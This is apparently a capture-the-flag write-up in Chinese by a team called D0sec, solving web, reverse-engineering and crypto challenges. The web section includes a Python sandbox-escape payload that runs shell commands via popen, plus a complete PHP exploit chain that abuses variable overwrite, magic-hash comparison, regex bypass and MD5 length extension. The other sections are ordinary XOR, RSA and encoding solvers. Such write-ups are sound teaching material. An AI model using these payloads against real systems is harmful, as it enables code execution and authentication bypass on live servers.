战队:D0sec
队员:xiaolaisec
WEB
菜狗工具#1
删除JS里的disable让运行键可点击
Exp:print(''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read())
注:原文少了一个右括号。下标 132 取决于目标解释器中 __subclasses__() 的顺序(此处通常是 os._wrap_close),换环境需重新定位。
ezPHP
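<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
$a = 'O.U.C';
// The raw query string is read before any filtering. parse_str() with a single
// argument registers every query parameter as a local variable (removed in
// PHP 8), so ?a=...&secret=... overwrites $a -- and even $secret from flag.php --
// before any of the checks below run.
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
// Blacklist on the raw query string: '_' and '.' plus their URL encodings.
// It does not see parameter-name normalisation: PHP maps spaces in names to
// '_', so O%20U%20C still lands in $_GET['O_U_C'].
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}
echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
// Loose comparison of two hashes. md5('O.U.C') does not start with "0e", so
// no magic hash matches the original $a -- but parse_str() lets the attacker
// replace $a, e.g. ?a=s878926199a&b=s155964671a: both md5s are "0e..." strings,
// which == treats as 0 == 0, while $a != $b stays true.
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦,不错喔".'<br>';
    $O_U_C=$_GET['O_U_C'];
    // Two tricks: (1) the filter bans '_', but ?O%20U%20C=... reaches
    // $_GET['O_U_C'] because PHP rewrites spaces in parameter names;
    // (2) '$' in /^100$/ also matches right before a trailing newline, so
    // "100\n" satisfies the regex while "100\n" !== '100' keeps the strict
    // check true. Send O%20U%20C=100%0a.
    if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
        // Strict === does not help when md5() gets an array: PHP 7 returns
        // NULL (with a warning) for both, so NULL === NULL passes and
        // [1] != [2] holds. POST md51[]=1&md52[]=2. (Newer PHP versions may
        // throw a TypeError here instead -- confirm against the target.)
        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好,那么好'.'<br>';
            // Hash length-extension: md5($secret.'ouc') is leaked in the else
            // branch, and md5($secret . X) with an unknown-prefix secret is not a
            // MAC. Given only the secret's length (unknown, found by trial: 15)
            // the attacker forges md5($secret.'ouc'.<padding>.'aaa') and supplies
            // the matching suffix as ?md5= (note it is URL-decoded a second time
            // here). parse_str() above also allows overwriting $secret directly.
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
        }else{
            echo '不过如此';
        }
    }else{
        die("不行嘛(´ェ`)");
    }
}else{
    echo '嗨害嗨 (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}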
payload:
?a=s878926199a&b=s155964671a&O%20U%20C=100%0a&md5=ouc%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00aaa
post: md51[]=1&md52[]=2
Cookie: md5=9a6197a1c86ccf149c6588f020d7a5e8
Reverse
xor++
放IDA进到main函数
/*
 * Cleaned-up reading of the decompiled main(): the input is compared
 * byte-by-byte against a fixed 37-entry table under a rolling XOR key that
 * starts at 67 ('C') and increases by one per position. The first mismatch
 * ends the check.
 */
int main(int argc, const char **argv, const char **envp)
{
    /* v4 in the listing: the expected (input ^ key) values. */
    static const char expected[37] = {
        37, 40, 36, 33, 60, 42, 60, 30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32,
        12, 9, 32, 104, 55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26
    };
    /* v5 in the listing: eight zeroed 8-byte slots, i.e. a 64-byte buffer. */
    char input[64] = {0};
    int key = 67;   /* v8 */
    int ok = 1;     /* v7 */
    unsigned int pos;

    (void)argc;
    (void)argv;
    (void)envp;

    puts("Guess what is the flag?");
    /* Width-limited read: at most 50 characters plus the NUL fit in 64 bytes. */
    scanf("%50s", input);

    for (pos = 0; pos < sizeof expected; ++pos) {
        if ((key ^ input[pos]) != expected[pos]) {
            ok = 0;
            break;
        }
        ++key;
    }

    puts(ok ? "That is the right answer!" : "Wrong answer sadly...");
    return 0;
}
简单的异或,a^b=c,那么b=c^a
Exp:
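# Expected-byte table lifted from the IDA listing (v4): the binary checks
# input[i] ^ key_i == v4[i] with key_i = 67 + i.
v4 = [37, 40, 36, 33, 60, 42, 60, 30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32, 12, 9, 32, 104, 55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26]


def xor_decrypt(cipher: list[int], key_start: int = 67) -> str:
    """Invert the binary's check: since input ^ key == cipher, input == cipher ^ key.

    Args:
        cipher: the expected-byte table from the binary (``v4``).
        key_start: the initial XOR key (``v8`` in the binary); it increments
            by one for every byte, so the key for index ``i`` is
            ``key_start + i``.

    Returns:
        The recovered plaintext as a ``str`` (empty for an empty table).
    """
    # enumerate() yields the rolling key directly, replacing the manual v8 counter.
    return "".join(chr(byte ^ key) for key, byte in enumerate(cipher, start=key_start))


if __name__ == "__main__":
    print(xor_decrypt(v4))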
Crypto
NeXT RSA
Exp:
import sympy
import libnum
# 给定的参数
n = 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761
e = 65537
c =
23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544
# 分解 n 得到 p 和 q
p, q = sympy.factorint(n)
# 计算欧拉函数
r = (p - 1) * (q - 1)
# 计算私钥
d = libnum.invmod(e, r)
# 使用私钥解密密文
m = pow(c, d, n)
# 将解密后的明文转换成字符串
flag = libnum.n2s(m)
print(flag)
#flag{n0t_s3Cure_4t_aIl}
模!
Exp:
from math import factorial
# 逆向计算哈希值,找到原始的字符串
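def reverse_hash(hash_value: int) -> str:
    """Invert the challenge hash.

    The hash packs one byte per character, where the byte for ``ch`` is
    ``factorial(ord(ch)) % 233`` and the last character sits in the low byte.

    Args:
        hash_value: the packed hash as a non-negative integer.

    Returns:
        The recovered string (empty for ``0``).

    Raises:
        ValueError: if some byte of ``hash_value`` is not produced by any
            character of the alphabet. The original loop never advanced in
            that case and spun forever.
    """
    table = "abcdefghijklmnopqrstuvwxyz{}"
    # Build the byte -> char map once instead of 28 factorials per output byte.
    # setdefault keeps the FIRST alphabet character for a residue, matching the
    # original first-match search (233 is prime so residues are non-zero, but
    # they are not guaranteed to be distinct).
    lookup: dict[int, str] = {}
    for char in table:
        lookup.setdefault(factorial(ord(char)) % 233, char)

    chars: list[str] = []
    while hash_value > 0:
        byte = hash_value & 0xFF
        if byte not in lookup:
            raise ValueError(f"byte {byte:#04x} is not the hash of any alphabet character")
        chars.append(lookup[byte])
        hash_value >>= 8
    # Bytes were consumed low-to-high, i.e. last character first.
    return "".join(reversed(chars))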
# Packed hash handed out by the challenge (one byte per flag character).
hashed_value = 2508450541438803643416583335895451914701844680466330955847
# Undo the per-character packing and show what comes out.
original_string = reverse_hash(hashed_value)
print(f"Original String: {original_string}")
#flag{dalaodalaohaolihai}
Base64*rot13
MzkuM3gyrzI6Z3cyrzHlMKcSra0=
先rot13解密再base64解码即可